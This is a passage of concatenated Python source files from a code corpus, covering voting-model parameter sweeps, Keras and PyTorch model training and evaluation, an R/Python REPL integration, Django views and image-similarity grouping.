candidate_list.sort(key=lambda tup: tup[1])\n for i in range(k):\n group_k = candidate_list[:k]\n group_k_list_of_dict = {}\n for tup in group_k:\n group_k_list_of_dict[tup[0]] =tup [1]\n model_value = self.models.KP(group_k_list_of_dict, self.utilities_dict)\n model_values_dict[i + 1] = model_value\n return model_values_dict, self.s\n\n def get_AT_parameter(self, division_param, l_bound, u_bound):\n \"\"\"\n :param division_param: (int) how many b values the user wants\n :param l_bound: (int) the lower bound for the parameter\n :param u_bound: (int) the upper bound for the parameter\n :return: all AT predictions to all b values\n \"\"\"\n model_values_dict = {}\n candidates = list(self.s.keys())\n for i_1 in range(1, division_param + 1):\n b_1 = i_1 * (u_bound - l_bound)/ division_param\n for i_2 in range(1, division_param + 1):\n b_2 = i_2 * (u_bound - l_bound) / division_param\n for i_3 in range(1, division_param + 1):\n b_3 = i_3 * (u_bound - l_bound) / division_param\n b_dict = {candidates[0]: b_1, candidates[1]: b_2, candidates[2] : b_3}\n model_value = self.models.AT(self.utilities_dict, b_dict, self.s,)\n b_list = tuple(b_dict.items())\n model_values_dict[b_list] = model_value\n return model_values_dict, self.s\n\n\n def get_AU_parameters(self, division_param_b, l_bound_b, u_bound_b, e, division_param_a, l_bound_a = 0, u_bound_a = 2):\n \"\"\"\n :param division_param_b: (int) how many b values the user wants\n :param division_param_a: (int) how many a values the user wants\n :param l_bound_b: (int) the lower bound for the parameter b\n :param u_bound_b: (int) the upper bound for the parameter b\n :param l_bound_a: (int) the lower bound for the parameter a, if none l_bound_a = 0\n :param u_bound_a: (int) the upper bound for the parameter a if none u_bound_a = 2\n :param e: (float) the epsilon\n :return: all AU predictions to all b and a values\n \"\"\"\n\n model_values_dict = {}\n candidates = list(self.s.keys())\n for i_1 in range(1, division_param_b + 1):\n b_1 = round(i_1 * (u_bound_b - l_bound_b) / division_param_b,3)\n for i_2 in range(1, division_param_b + 1):\n b_2 = round(i_2 * (u_bound_b - l_bound_b) / division_param_b,3)\n for i_3 in range(1, division_param_b + 1):\n b_3 = round(i_3 * (u_bound_b - l_bound_b) / division_param_b,3)\n b_dict = {candidates[0]: b_1, candidates[1]: b_2, candidates[2]: b_3}\n for j in range(1, division_param_a + 1):\n a = round(j * (u_bound_a - l_bound_a) / division_param_a,3)\n model_value = self.models.AU(self.utilities_dict, e, a, b_dict, self.s,)\n params_dict = b_dict.copy()\n params_dict.update({'a': a})\n params_list = tuple(params_dict.items())\n model_values_dict[params_list] = model_value\n return model_values_dict, self.s\n\n def get_LD_parameter(self, division_param, l_bound, u_bound):\n \"\"\"\n :param division_param: (int) how many r values the user wants\n :param l_bound: (int) the lower bound for the parameter\n :param u_bound: (int) the upper bound for the parameter\n :return: all LD predictions to all r values\n \"\"\"\n model_values_dict = {}\n for i in range(1, division_param + 1):\n r = i * (u_bound - l_bound)/ division_param #can change it to np.linspace\n model_value = self.models.LD(r, self.s, self.utilities_dict)\n model_values_dict[r] = model_value\n return model_values_dict, self.s\n\n\n\n\n\n\n","sub_path":"voters.py","file_name":"voters.py","file_ext":"py","file_size_in_byte":5910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"460667590","text":"from keras.models import Sequential\nfrom keras.layers import Dense\nimport keras.metrics\nimport pandas as pd\nimport numpy as np\nimport math\nfrom keras.callbacks import CSVLogger\nfrom sklearn.model_selection import train_test_split\nimport os\nimport statistics\nfrom keras.models import load_model\n\n\ndef build_dataset():\n\n #Combine all projects\n projects = ['accumulo', 'bookkeeper', 'camel', 'cassandra', 'cxf', 'derby', 'hive', 'openjpa', 'pig', 'wicket']\n dfs = []\n for p in projects:\n p_df = pd.read_csv(\"../files/\"+p+\"/train_data.csv\")\n dfs.append(p_df)\n\n df = pd.concat(dfs)\n\n #Only use buggy methods for this training\n df = df.loc[(df['buggy']==1)&(pd.notna(df['experience']))]\n\n df['experience'] = df['experience'].apply(lambda exp : int(exp))\n\n #Convert vector data to lists\n df['vector'] = df['vector'].apply(lambda v : v.replace('\\n','').split(' '))\n df['vector'] = df['vector'].apply(lambda v : [float(i) for i in v])\n\n #Shuffle the row ordering\n df = df.sample(frac=1).reset_index(drop=True)\n\n #Specify input ande output columns\n X = pd.DataFrame(df['vector'].to_list())\n y = df['experience']\n\n #Split into train and test sets\n X_train,X_test,y_train,y_test = train_test_split(X,y,test_size = 0.1)\n\n #Save train and test sets\n X_train.to_pickle(\"../files/nn_training/pickle_barrel/X_train_\"+nn_name+\".pkl\")\n X_test.to_pickle(\"../files/nn_training/pickle_barrel/X_test_\"+nn_name+\".pkl\")\n y_train.to_pickle(\"../files/nn_training/pickle_barrel/y_train_\"+nn_name+\".pkl\")\n y_test.to_pickle(\"../files/nn_training/pickle_barrel/y_test_\"+nn_name+\".pkl\")\n\n return X_train,X_test,y_train,y_test\n\ndef get_dataset():\n\n #If the dataset has never been made, make it\n if not os.path.exists(\"../files/nn_training/pickle_barrel/X_train_\"+nn_name+\".pkl\"):\n return build_dataset()\n\n #If it has been made, load the saved dataset\n X_train = pd.read_pickle(\"../files/nn_training/pickle_barrel/X_train_\"+nn_name+\".pkl\")\n X_test = pd.read_pickle(\"../files/nn_training/pickle_barrel/X_test_\"+nn_name+\".pkl\")\n y_train = pd.read_pickle(\"../files/nn_training/pickle_barrel/y_train_\"+nn_name+\".pkl\")\n y_test = pd.read_pickle(\"../files/nn_training/pickle_barrel/y_test_\"+nn_name+\".pkl\")\n\n return X_train,X_test,y_train,y_test\n\n\ndef load_nn():\n if os.path.exists(\"../files/nn_training/models/NN_semantic_\"+nn_name+\".h5\"):\n return load_model(\"../files/nn_training/models/NN_semantic_\"+nn_name+\".h5\")\n\n input_dimensions = 384\n output_dimensions = 1\n model = Sequential()\n model.add(Dense(128, input_dim=input_dimensions,activation='relu'))\n model.add(Dense(32, activation='relu'))\n model.add(Dense(output_dimensions,activation='linear'))\n model.compile(loss=\"mean_squared_error\", optimizer='adam')\n return model\n\ndef train(nepochs):\n #Train model\n csv_logger = CSVLogger(\"../files/nn_training/training/nn_training_\"+nn_name+\".csv\", append=True)\n model.fit(X_train,y_train,validation_data = (X_test,y_test), epochs=nepochs, verbose=1, callbacks=[csv_logger])\n model.save(\"../files/nn_training/models/NN_semantic_\"+nn_name+\".h5\")\n\n\ndef test():\n model = load_model(\"../files/nn_training/models/NN_semantic_\"+nn_name+\".h5\")\n y_pred = model.predict(X_test)\n #Converting predictions to label\n pred = list()\n test = list()\n MAE = []\n MSE = []\n for i in range(len(y_pred)):\n MAE.append(abs((y_pred[i][0]) - (y_test.iloc[i])))\n MSE.append(((y_pred[i][0]) - (y_test.iloc[i]))**2)\n MAE = statistics.median(MAE)\n MSE = statistics.mean(MSE)\n\n print(\"Mean Absolute Error:\",MAE)\n print(\"Mean Squared Error:\",MSE)\n\n\n\nnn_name = \"experience\"\nmodel = load_nn()\nX_train,X_test,y_train,y_test = get_dataset()\ntrain(0)\ntest()\n","sub_path":"python_models/NN_experience.py","file_name":"NN_experience.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"16152377","text":"with open(\"./pattern\") as pattern_file:\n output_file = open('pattern_convert','w')\n for row in pattern_file:\n newline = ''\n for char in row:\n if char == '.':\n newline += '0'\n else:\n newline += '1'\n while len(newline) < 100:\n newline += '0'\n output_file.write(newline + '\\n')\n output_file.close()\n\n\n","sub_path":"convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"538050104","text":"from __future__ import unicode_literals\nimport os\nimport sys\nfrom code import compile_command\n\nfrom prompt_toolkit.completion import Completion\n\nfrom rchitect import rcall, rcopy\nfrom rchitect.interface import roption, setoption, set_hook, package_event\n\nfrom radian.rutils import package_is_installed, source_file\n\nfrom radian.key_bindings import insert_mode, default_focused, cursor_at_begin, text_is_empty\nfrom radian.key_bindings import commit_text\nfrom radian import get_app\nfrom radian.settings import radian_settings as settings\n\nfrom six import text_type\n\ntry:\n import jedi\nexcept ImportError:\n pass\n\n\nRETICULATE_MESSAGE = \"\"\"\nThe host python environment is {}\nand `radian` is forcing `reticulate` to use this version of python.\nAny python packages needed, e.g., `tensorflow` and `keras`,\nhave to be available to the current python environment.\n\nFile an issue at https://github.com/randy3k/radian if you encounter any\ndifficulties in loading `reticulate`.\n\"\"\".format(sys.executable).strip()\n\n\ndef configure():\n if not roption(\"radian.suppress_reticulate_message\", False):\n set_hook(package_event(\"reticulate\", \"onLoad\"), reticulate_message_hook)\n\n if package_is_installed(\"reticulate\") and roption(\"radian.enable_reticulate_prompt\", True):\n set_hook(package_event(\"reticulate\", \"onLoad\"), reticulate_prompt_hook)\n\n session = get_app().session\n kb = session.modes[\"r\"].prompt_key_bindings\n browsekb = session.modes[\"browse\"].prompt_key_bindings\n\n @kb.add('~', filter=insert_mode & default_focused & cursor_at_begin & text_is_empty)\n @browsekb.add('~', filter=insert_mode & default_focused & cursor_at_begin & text_is_empty)\n def _(event):\n setoption(\"radian.suppress_reticulate_message\", True)\n commit_text(event, \"reticulate::repl_python()\", False)\n\n\ndef reticulate_message_hook(*args):\n if not roption(\"radian.suppress_reticulate_message\", False):\n rcall(\"packageStartupMessage\", RETICULATE_MESSAGE)\n\n\ndef reticulate_prompt_hook(*args):\n source_file(os.path.join(os.path.dirname(__file__), \"key_bindings.R\"))\n\n\ndef prase_text_complete(code):\n if \"\\n\" in code:\n try:\n return compile_command(code, \"\", \"exec\") is not None\n except Exception:\n return True\n else:\n if len(code.strip()) == 0:\n return True\n elif code[0] == \"?\" or code[-1] == \"?\":\n return True\n else:\n try:\n return compile_command(code, \"\", \"single\") is not None\n except Exception:\n return True\n\n\ndef get_reticulate_completions(document, complete_event):\n word = document.get_word_before_cursor()\n prefix_length = settings.completion_prefix_length\n if len(word) < prefix_length and not complete_event.completion_requested:\n return []\n\n glo = rcopy(rcall((\"reticulate\", \"py_run_string\"), \"globals()\"))\n loc = rcopy(rcall((\"reticulate\", \"py_run_string\"), \"locals()\"))\n try:\n script = jedi.Interpreter(\n document.text,\n column=document.cursor_position_col,\n line=document.cursor_position_row + 1,\n path=\"input-text\",\n namespaces=[glo, loc]\n )\n return [\n Completion(\n text_type(c.name_with_symbols),\n len(text_type(c.complete)) - len(text_type(c.name_with_symbols)))\n for c in script.completions()\n ]\n\n except Exception:\n return []\n","sub_path":"radian/reticulate/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"329616776","text":"import attr\nimport numpy as np\nimport torch\nimport torch.nn as nn\n\nfrom seq2struct.models import spider_enc\nfrom seq2struct.utils import batched_sequence\nfrom seq2struct.utils import registry\n\n\n@attr.s\nclass EncoderOutput:\n q_enc = attr.ib()\n q_len = attr.ib()\n col_enc = attr.ib()\n col_name_len = attr.ib()\n col_len = attr.ib()\n\n\nclass FakePreproc:\n vocab = None\n\n\nclass Seq2structEncoder(nn.Module):\n def __init__(self, N_word, N_h, N_depth, word_embedding_layer, encode_cols, spider_enc_config, gpu):\n super(Seq2structEncoder, self).__init__()\n self.N_word = N_word\n self.N_h = N_h\n self.N_depth = N_depth\n\n self.word_embedding_layer = word_embedding_layer\n self.encode_cols = encode_cols\n self.zero_emb = np.zeros(self.N_word, dtype=np.float32)\n self.gpu = gpu\n\n self.spider_enc = registry.instantiate(\n spider_enc.SpiderEncoderV2,\n spider_enc_config,\n device=torch.device('cuda') if gpu else torch.device('cpu'),\n preproc=FakePreproc,\n word_emb_size=N_word,\n recurrent_size=N_h,\n )\n\n \n def _lookup_embeddings(self, seqs):\n # shape: [sum of seq lengths, 1, N_word]\n embs = torch.from_numpy(np.stack([\n self.word_embedding_layer.word_emb.get(token, self.zero_emb)\n for seq in seqs\n for token in seq\n ], axis=0)).unsqueeze(1)\n if self.gpu:\n embs = embs.cuda()\n boundaries = np.cumsum([0] + [len(seq) for seq in seqs])\n\n return embs, boundaries\n\n def _lookup_embeddings_batched(self, token_lists):\n # token_lists: list of list of lists\n # [batch, num descs, desc length]\n # - each list contains tokens\n # - each list corresponds to a column name, table name, etc.\n\n # PackedSequencePlus, with shape: [batch, sum of desc lengths, emb_size]\n all_embs = batched_sequence.PackedSequencePlus.from_lists(\n lists=[\n [\n token \n for token_list in token_lists_for_item\n for token in token_list\n ]\n for token_lists_for_item in token_lists\n ],\n item_shape=(self.N_word,),\n tensor_type=torch.FloatTensor,\n item_to_tensor=lambda token, batch_idx, out: out.copy_(torch.from_numpy(\n self.word_embedding_layer.word_emb.get(token, self.zero_emb))),\n )\n if self.gpu:\n all_embs = all_embs.apply(lambda d: d.cuda())\n\n # boundaries shape: [batch, num descs + 1]\n boundaries = [\n np.cumsum([0] + [len(token_list) for token_list in token_lists_for_item])\n for token_lists_for_item in token_lists]\n\n return all_embs, boundaries\n\n def _pad_sequences(self, seq_encs):\n # each element of seq_encs has shape\n # [1, seq length, emb size]\n # returns [batch size, max length, emb size]\n max_length = max(seq_enc.shape[1] for seq_enc in seq_encs)\n result = seq_encs[0].data.new(len(seq_encs), max_length, *seq_encs[0].shape[2:]).fill_(0)\n for i, seq_enc in enumerate(seq_encs):\n result[i, :seq_enc.shape[0]] = seq_enc[:, 0]\n return result\n\n def forward_unbatched(self, data, perm, st, ed, table_type):\n batch_size = ed - st\n\n q_encs = []\n col_encs = []\n # Number of columns in each entry of batch\n col_lens = []\n\n # TODO need to call forward_unbatched versions for this to work\n for permuted_idx in perm[st:ed]:\n q_enc, (_, _) = self.spider_enc.question_encoder(self._lookup_embeddings([data[permuted_idx]['question_tokens']]))\n\n table_names, column_names, column_types, \\\n column_to_table, table_to_column, foreign_keys, \\\n foreign_keys_tables, primary_keys = data[permuted_idx]['ts']\n desc = {\n 'columns': [[column_type] + column_name.split() for (table_id, column_name), column_type in zip(column_names, column_types)],\n 'tables': [table_name.split() for table_name in table_names],\n 'column_to_table': column_to_table,\n 'table_to_column': table_to_column,\n 'foreign_keys': foreign_keys,\n 'foreign_keys_tables': foreign_keys_tables,\n 'primary_keys': primary_keys,\n }\n\n c_enc, c_boundaries = self.spider_enc.column_encoder(\n self._lookup_embeddings(desc['columns']))\n t_enc, t_boundaries = self.spider_enc.table_encoder(\n self._lookup_embeddings(desc['tables']))\n #assert np.all((c_boundaries[1:] - c_boundaries[:-1]) == 1)\n \n q_enc_new, c_enc_new, t_enc_new = self.spider_enc.encs_update(\n desc, q_enc, c_enc, c_boundaries, t_enc, t_boundaries)\n \n q_encs.append(q_enc_new)\n col_encs.append(c_enc_new)\n col_lens.append(len(desc['columns']))\n \n q_enc = self._pad_sequences(q_encs)\n q_len = np.array([q_enc_elem.shape[1] for q_enc_elem in q_encs], dtype=np.int64)\n col_enc = self._pad_sequences(col_encs)\n col_name_len = None\n col_len = np.array(col_lens, dtype=np.int64)\n\n return EncoderOutput(q_enc, q_len, col_enc, col_name_len, col_len)\n\n def forward(self, data, perm, st, ed, table_type):\n batch_size = ed - st\n\n descs = []\n for permuted_idx in perm[st:ed]:\n table_names, column_names, column_types, \\\n column_to_table, table_to_column, foreign_keys, \\\n foreign_keys_tables, primary_keys = data[permuted_idx]['ts']\n desc = {\n 'question': data[permuted_idx]['question_tokens'],\n 'columns': [[column_type] + column_name.split() for (table_id, column_name), column_type in zip(column_names, column_types)],\n 'tables': [table_name.split() for table_name in table_names],\n 'column_to_table': column_to_table,\n 'table_to_column': table_to_column,\n 'foreign_keys': foreign_keys,\n 'foreign_keys_tables': foreign_keys_tables,\n 'primary_keys': primary_keys,\n }\n descs.append(desc)\n\n q_enc, _ = self.spider_enc.question_encoder(\n self._lookup_embeddings_batched([[desc['question']] for desc in descs]))\n c_enc, c_boundaries = self.spider_enc.column_encoder(\n self._lookup_embeddings_batched([desc['columns'] for desc in descs]))\n t_enc, t_boundaries = self.spider_enc.table_encoder(\n self._lookup_embeddings_batched([desc['tables'] for desc in descs]))\n\n #q_enc_new, c_enc_new, t_enc_new = self.spider_enc.encs_update(descs, q_enc, c_enc, c_boundaries, t_enc, t_boundaries)\n #q_enc, q_len = q_enc_new.pad(batch_first=True)\n #q_len = np.array(q_len, dtype=np.int64)\n #col_enc, col_len = c_enc_new.pad(batch_first=True)\n #col_name_len = None\n #col_len = np.array(col_len, dtype=np.int64)\n\n q_encs = []\n col_encs = []\n # Number of columns in each entry of batch\n col_lens = []\n for i, desc in enumerate(descs):\n q_enc_new, c_enc_new, t_enc_new = self.spider_enc.encs_update.forward_unbatched(\n desc,\n q_enc.select(i).unsqueeze(1),\n c_enc.select(i).unsqueeze(1),\n c_boundaries[i],\n t_enc.select(i).unsqueeze(1),\n t_boundaries[i])\n \n q_encs.append(q_enc_new)\n col_encs.append(c_enc_new)\n col_lens.append(len(desc['columns']))\n \n q_enc = self._pad_sequences(q_encs)\n q_len = np.array([q_enc_elem.shape[1] for q_enc_elem in q_encs], dtype=np.int64)\n col_enc = self._pad_sequences(col_encs)\n col_name_len = None\n col_len = np.array(col_lens, dtype=np.int64)\n return EncoderOutput(q_enc, q_len, col_enc, col_name_len, col_len)\n","sub_path":"models/seq2struct_encoder.py","file_name":"seq2struct_encoder.py","file_ext":"py","file_size_in_byte":8142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"323993842","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import Product,Menu,Item;\n# Create your views here.\n\ndef index(request):\n return render(request,'index.html')\n\ndef addProduct(request):\n return render(request,'addProduct.html')\n\ndef saveProduct(request):\n pid=request.POST['pid']\n pname=request.POST['pname']\n pdate=request.POST['pdate']\n p=Product(pid,pname,pdate)\n p.save()\n\n return render(request,'index.html')\n\ndef displayProducts(request):\n records=Product.objects.all()\n\n return render(request,'display.html',{'recs':records})\n\n\ndef menuCreate(request):\n breafast=Menu(101,'Breakfast')\n item1=Item(901,'idli',20,menu=breafast)\n item2=Item(902,'soup',30,menu=breafast)\n cooldrinks=Menu(201,'cool drinks')\n item3=Item(801,'pepsy',menu=cooldrinks)\n item4=Item(802,'mazza',menu=cooldrinks)\n item5=Item(803,'sprite',menu=cooldrinks)\n icecreams=Menu(301,'Ice Creams')\n item6=Item(401,'venalaa',menu=icecreams)\n item7=Item(402,'choocklet',menu= icecreams)\n\n breafast.save();\n item1.save()\n item2.save()\n cooldrinks.save()\n item3.save()\n item4.save()\n item5.save()\n icecreams.save()\n item6.save()\n item7.save()\n\n return render(request,'display.html')\n\n\ndef menuDelete(request):\n return render(request,'display.html')","sub_path":"ProductApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"160464051","text":"# -*- coding: utf-8 -*-\nimport warnings\nwarnings.simplefilter(action='ignore', category=(FutureWarning,UserWarning))\n\nimport os, sys\nimport shutil\nimport logging\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s, p%(process)s %(levelname)-8s [%(pathname)s:%(module)s:%(funcName)s:%(lineno)d] %(message)s')\nimport textwrap, argparse\nfrom argparse import RawDescriptionHelpFormatter\n\nimport cv2\nimport numpy as np\nfrom skimage import img_as_float, color\nfrom skimage.measure import compare_ssim as ssim\nutils_parent_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '../..'))\nsys.path.append(os.path.join(utils_parent_dir, 'modules/common'))\nimport utils\n\ndef parse_arguments():\n parser = argparse.ArgumentParser(\n formatter_class = argparse.RawDescriptionHelpFormatter,\n description=textwrap.dedent('''\n Given a set of images, find its similar images for each one in the set.\n ''')\n )\n\n # Required arguments\n parser.add_argument(\n 'in_dir',\n help='Directory to load in images.'\n )\n\n # Required arguments\n parser.add_argument(\n 'out_dir',\n help='Directory to save output images.'\n )\n\n # Optional arguments\n parser.add_argument(\n '--pattern', required=False,\n metavar='',\n default='',\n help='Naming pattern of the desired files (default: \"\").'\n )\n\n # Optional arguments\n parser.add_argument(\n '--extensions', required=False,\n metavar='',\n default='jpg',\n help='List of extensions of the desired files, seperated by comma (default: \"jpg\").'\n )\n\n return parser.parse_args()\n\ndef process_images(path1, path2):\n # Load in one image\n img1 = utils.load_color_image(path1)\n img1 = color.rgb2gray(img1)\n img1 = img_as_float(img1)\n\n # Load in the other image\n img2 = utils.load_color_image(path2)\n img2 = color.rgb2gray(img2)\n img2 = img_as_float(img2)\n\n if img1.shape == img2.shape:\n return ssim(img1, img2, data_range=img1.max() - img1.min())\n else:\n return 0.0\n\ndef process_images_thread(image_pairs, similarity, beg, end):\n for i in range(beg, end):\n path1, path2, i, j = image_pairs[i]\n similarity[i][j] = process_images(path1, path2)\n\ndef do_it(in_dir, out_dir, pattern, extensions):\n # Check if input directory exists\n if not os.path.exists(in_dir):\n logging.critical('Failed to find {}'.format(in_dir))\n sys.exit()\n\n # Get all images in the input directory\n _, image_paths, _ = utils.list_files(in_dir, pattern, extensions)\n image_paths = sorted(image_paths)\n\n n_samples = len(image_paths)\n logging.info('Total files: {}'.format(n_samples))\n\n # Generate image pairs for parallel computing\n image_pairs = []\n for i in range(n_samples):\n query_image_path = os.path.join(in_dir, image_paths[i])\n\n for j in range(i+1, n_samples):\n current_image_path = os.path.join(in_dir, image_paths[j])\n\n image_pairs.append((query_image_path, current_image_path, i, j))\n\n n_pairs = len(image_pairs)\n similarity = np.zeros((n_samples, n_samples), dtype = np.float32)\n threads = utils.parallel(n_pairs, process_images_thread, image_pairs, similarity)\n\n for i in range(len(threads)):\n threads[i].join()\n\n# # np.save('./similarity.npy', similarity)\n# similarity = np.load('./similarity.npy')\n\n # Group similar images to sets\n similar_image_sets = []\n\n k = 0\n for i in range(n_samples):\n for j in range(i+1, n_samples):\n if similarity[i][j] >= 0.7:\n # logging.info('{} is similar to {}'.format(image_pairs[k][0], image_pairs[k][1]))\n\n # Add a new image to one of the existing sets if it belongs to\n # the same group\n found = False\n for image_set in similar_image_sets:\n if image_pairs[k][0] in image_set or image_pairs[k][1] in image_set:\n image_set.add(image_pairs[k][0])\n image_set.add(image_pairs[k][1])\n found = True\n break\n\n # Otherwise, create new one and add the set to the list of sets\n if not found:\n similar_image_sets.append(set([image_pairs[k][0], image_pairs[k][1]]))\n k += 1\n\n for i, image_set in enumerate(similar_image_sets):\n # Copy all images in the same set to a single folder\n out_sub_dir = os.path.join(out_dir, '{:02}'.format(i))\n utils.safe_makedirs(out_sub_dir)\n\n for image_path in image_set:\n dirname, filename = os.path.split(image_path)\n out_path = os.path.join(out_sub_dir, filename)\n shutil.copyfile(image_path, out_path)\n\nif __name__ == '__main__':\n\n args = parse_arguments()\n\n # Remove the whitespaces in list of extensions\n extensions = utils.trim_whitespaces(args.extensions, side_only=False)\n\n # Get the list of extensions and discard the null character\n extensions = list(filter(None, extensions.split(',')))\n\n # Remove the redundant elements\n extensions = list(set(extensions))\n\n # Tidy up directories\n args.in_dir = args.in_dir.rstrip('/\\\\')\n args.out_dir = args.out_dir.rstrip('/\\\\')\n\n do_it(args.in_dir, args.out_dir, args.pattern, extensions)\n","sub_path":"real_life/warning_lights/tools/datasets/find_similar_images.py","file_name":"find_similar_images.py","file_ext":"py","file_size_in_byte":4978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"516820960","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport numpy as np\nfrom os import listdir\nfrom PIL import Image\nimport tensorflow as tf\nfrom tensorflow.keras.models import load_model\n\ndef load_sign_model():\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.5)\n sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options)) \n tf.reset_default_graph()\n model = load_model('donkey_sign_epoch30_label8.h5')\n return model\n\ndef img_in_model(model):\n image_size_width = 50\n image_size_height = 50\n num_labels = 5\n num_channels = 3 \n epochs = 20\n\n a_counter = 0\n b_counter = 0\n c_counter = 0\n s_counter = 0\n flag = 0\n\n test_data = 'mask_img'\n for test_img in listdir(test_data):\n print('{}/{}'.format(test_data, test_img))\n load_img = Image.open('{}/{}'.format(test_data, test_img))\n # load_img_gray = load_img.convert(\"L\")\n load_img01 = load_img.resize((image_size_height,image_size_width))\n load_img02 = np.asarray(load_img01, dtype=np.float32)\n my_img = np.reshape(load_img02, [-1,image_size_height,image_size_width,num_channels]) / 255\n pre_label = model.predict(my_img)\n pre_label = np.argmax(pre_label,1)\n print(pre_label)\n return pre_label\n\nif __name__ == '__main__': \n model = load_sign_model()\n img_path = input('img_path : ')\n img_in_model(model)\n # print(pre_label)\n # fig=plt.figure()\n # for test_img in listdir(test_data):\n \n # if flag == 12:\n # break\n # all_data = all_data + 1\n # load_img = Image.open(f'{test_data}{test_img}')\n # load_img_gray = load_img.convert(\"L\")\n # load_img01 = load_img.resize((image_size_height,image_size_width))\n # load_img02 = np.asarray(load_img01, dtype=np.float32)\n # my_img = np.reshape(load_img02, [-1,image_size_height,image_size_width,num_channels]) / 255\n \n # pre_label = model.predict(my_img)\n # pre_label = np.argmax(pre_label,1)\n # print(pre_label)\n \n # y = fig.add_subplot(3,4,flag+1)\n # if pre_label == 0:\n # a_counter = a_counter + 1\n # str_label='A'\n # print(f'這是A')\n # elif pre_label == 1:\n # b_counter = b_counter + 1\n # str_label='B'\n # print(f'這是B')\n # elif pre_label == 2:\n # c_counter = c_counter + 1\n # str_label='C'\n # print(f'這是C')\n # elif pre_label == 3:\n # s_counter = s_counter + 1\n # str_label='STOP'\n # print(f'這是STOP')\n\n \n # y.imshow(load_img)\n # plt.title(str_label)\n # y.axes.get_xaxis().set_visible(False)\n # y.axes.get_yaxis().set_visible(False) \n # flag += 1\n \n # plt.show()\n \n # print('a: {}\\nb: {}\\nc: {}\\ns: {}\\nall: {}'.format(a_counter,b_counter,c_counter,s_counter,all_data))\n\n # xxx = (a_counter/all_data)*100\n # print('{:.2f}%'.format(xxx))\n\n\n","sub_path":"final_donkey_sign_model.py","file_name":"final_donkey_sign_model.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"199684961","text":"import argparse\nimport torch\nimport json\nimport numpy as np\nimport random\nimport xml.etree.ElementTree as ET\nfrom subprocess import check_output\n\nfrom model import Model\n\nimport sys\nfrom os import path\n\nsys.path.append('..')\n\nimport common.util\n\nnp.random.seed(1337)\nrandom.seed(1337)\ntorch.manual_seed(1337)\n# torch.cuda.manual_seed(1337)\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\nDATA_DIR = \"../data\"\nPREPARED_DIR = \"prepared_xu\"\nMODEL_DIR = \"models\"\nFN_WORD_IDX = \"word_idx_{language}.json\"\nFN_DATASET = \"dataset_{language}.npz\"\n\n\ndef label_rest_xml(fn, output_fn, corpus, label):\n print(output_fn)\n dom = ET.parse(fn)\n root = dom.getroot()\n zx = -1\n for sent in root.iter(\"sentence\"):\n if \"OutOfScope\" in sent.attrib:\n continue\n zx += 1\n tokens = corpus[zx]\n lb = label[zx]\n opins = ET.Element(\"Opinions\")\n token_idx, pt, tag_on = 0, 0, False\n start, end = -1, -1\n for ix, c in enumerate(sent.find('text').text):\n if token_idx < len(tokens) and pt >= len(tokens[token_idx]):\n pt = 0\n token_idx += 1\n\n if token_idx < len(tokens) and lb[token_idx] == 1 and pt == 0 and c != ' ':\n if tag_on:\n end = ix\n tag_on = False\n opin = ET.Element(\"Opinion\")\n opin.attrib['target'] = sent.find('text').text[start:end]\n opin.attrib['from'] = str(start)\n opin.attrib['to'] = str(end)\n opins.append(opin)\n start = ix\n tag_on = True\n elif token_idx < len(tokens) and lb[token_idx] == 2 and pt == 0 and c != ' ' and not tag_on:\n start = ix\n tag_on = True\n elif token_idx < len(tokens) and (lb[token_idx] == 0 or lb[token_idx] == 1) and tag_on and pt == 0:\n end = ix\n tag_on = False\n opin = ET.Element(\"Opinion\")\n opin.attrib['target'] = sent.find('text').text[start:end]\n opin.attrib['from'] = str(start)\n opin.attrib['to'] = str(end)\n opins.append(opin)\n elif token_idx >= len(tokens) and tag_on:\n end = ix\n tag_on = False\n opin = ET.Element(\"Opinion\")\n opin.attrib['target'] = sent.find('text').text[start:end]\n opin.attrib['from'] = str(start)\n opin.attrib['to'] = str(end)\n opins.append(opin)\n if c == ' ':\n pass\n elif tokens[token_idx][pt:pt+2] == '``' or tokens[token_idx][pt:pt+2] == \"''\":\n pt += 2\n else:\n pt += 1\n if tag_on:\n tag_on = False\n end = len(sent.find('text').text)\n opin = ET.Element(\"Opinion\")\n opin.attrib['target'] = sent.find('text').text[start:end]\n opin.attrib['from'] = str(start)\n opin.attrib['to'] = str(end)\n opins.append(opin)\n sent.append(opins)\n dom.write(output_fn)\n\n\ndef seqeval_evaluate(test_y, pred_y):\n\n cleaned_pred_y = []\n\n for idx, test_line in enumerate(test_y):\n pred_line = pred_y[idx]\n cleaned_pred_y.append(pred_line[:np.sum(test_line != -1)])\n\n return common.util.evaluate(test_y, cleaned_pred_y, return_tuple=True)\n\n\ndef test(model, test_X, raw_X, command, template, test_y, batch_size=128):\n pred_y = np.zeros((test_X.shape[0], 83), np.int16)\n model.eval()\n for offset in range(0, test_X.shape[0], batch_size):\n batch_test_X_len = np.sum(test_X[offset:offset+batch_size] != 0, axis=1)\n batch_idx = batch_test_X_len.argsort()[::-1]\n batch_test_X_len = batch_test_X_len[batch_idx]\n # print(batch_test_X_len[0])\n batch_test_X_mask = (test_X[offset:offset+batch_size] != 0)[batch_idx].astype(np.uint8)\n batch_test_X = test_X[offset:offset+batch_size][batch_idx]\n # 